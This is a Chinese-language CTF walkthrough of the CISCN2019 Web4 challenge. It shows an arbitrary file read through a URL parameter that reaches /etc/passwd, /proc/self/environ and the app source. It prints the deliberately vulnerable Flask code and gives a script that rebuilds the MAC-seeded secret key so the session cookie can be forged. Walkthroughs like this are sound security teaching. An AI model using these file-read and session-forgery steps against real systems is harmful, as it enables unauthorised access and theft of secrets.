[CISCN2019 华东南赛区]Web4

首先打开题目环境

有一个链接可以打开

这就直接跳转到了百度，在url栏里面有参数，就像直接试试读取文件
尝试读取/etc/passwd

成功读取，那就试试看能不能直接读取flag

果然不行，然后看了眼cookie，里面有session，那会不会是flask伪造？？？

那里面的session拿到JWT上解

解出这个，后面是base64加密的，解密后为www-data
如果是flask伪造的话我们就要找SECRET_KEY
读取/proc/self/environ

读取/app/app.py

# encoding:utf-8
import re, random, uuid, urllib
from flask import Flask, session, request

app = Flask(__name__)
random.seed(uuid.getnode())
app.config['SECRET_KEY'] = str(random.random()*233)
app.debug = True

@app.route('/')
def index():
    session['username'] = 'www-data'
    return 'Hello World! <a href="/read?url=https://baidu.com">Read somethings</a>'

@app.route('/read')
def read():
    try:
        url = request.args.get('url')
        m = re.findall('^file.*', url, re.IGNORECASE)
        n = re.findall('flag', url, re.IGNORECASE)
        if m or n:
            return 'No Hack'
        res = urllib.urlopen(url)
        return res.read()
    except Exception as ex:
        print str(ex)
    return 'no response'

@app.route('/flag')
def flag():
    if session and session['username'] == 'fuck':
        return open('/flag.txt').read()
    else:
        return 'Access denied'

if __name__=='__main__':
    app.run(
        debug=True,
        host="0.0.0.0"
    )

根据这段代码，我们知道当username为fuck的时候可以获取flag
并且也知道了SECRET_KEY的获取方式app.config['SECRET_KEY'] = str(random.random()*233)
random.seed(uuid.getnode())设置随机数种子，而python random生成的数是伪随机数，利用伪随机数的特性，只要种子是一样的，后面产生的随机数值也是一样的
uuid.getnode()，是网卡mac地址的十进制数，那我们就要知道网卡的mac地址，读取/sys/class/net/eth0/address

获得了mac地址，然后脚本把它转换为10进制数，然后转换成SECRET_KEY

import uuid
import random

mac = "02:42:ac:10:9c:3a"
temp = mac.split(':')
temp = [int(i,16) for i in temp]
temp = [bin(i).replace('0b','').zfill(8) for i in temp]
temp = ''.join(temp)
mac = int(temp,2)
random.seed(mac)
randStr = str(random.random()*233)

获得SECRET_KEY，伪造session

修改session

获得flag
flag{0221f202-cd99-4a50-84f2-e5deab965442}